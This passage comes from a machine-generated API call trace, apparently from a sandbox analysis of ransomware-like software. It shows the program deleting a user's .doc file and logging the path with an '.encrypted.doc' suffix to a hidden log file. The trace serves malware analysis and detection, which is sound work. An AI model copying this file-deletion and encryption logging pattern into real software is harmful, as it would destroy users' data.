lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.153] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.153] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.154] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\haqrv lvwyhv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0031.154] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.155] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.155] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.155] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.155] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.155] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.155] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.155] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.156] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.156] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", lpFilePart=0x0) returned 0x4e [0031.156] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73802d50, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xad2c0a0, ftLastAccessTime.dwHighDateTime=0x1d5b684, ftLastWriteTime.dwLowDateTime=0x1273d880, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1396e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="HaqrV LVwyHV.doc", cAlternateFileName="HAQRVL~1.DOC")) returned 0x7c2240 [0031.156] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\haqrv lvwyhv.doc")) returned 1 [0031.158] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73802d50, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xad2c0a0, ftLastAccessTime.dwHighDateTime=0x1d5b684, ftLastWriteTime.dwLowDateTime=0x1273d880, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1396e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="HaqrV LVwyHV.doc", cAlternateFileName="HAQRVL~1.DOC")) returned 0 [0031.158] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.158] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.159] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.159] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.159] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.159] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.160] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.160] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.160] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.160] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.161] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.161] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.161] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.161] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0031.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.161] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.161] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x6ed, lpOverlapped=0x0) returned 1 [0031.162] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.162] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x6ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.162] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0031.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.encrypted.doc\r\n", cchWideChar=91, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0031.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5b) returned 0x87a9d8 [0031.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.encrypted.doc\r\n", cchWideChar=91, lpMultiByteStr=0x87a9d8, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.encrypted.doc\r\n", lpUsedDefaultChar=0x0) returned 91 [0031.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0031.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0031.162] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x5a, lpOverlapped=0x0) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.163] CloseHandle (hObject=0x128) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0031.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.164] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.164] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.165] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.165] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.165] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.165] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.166] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 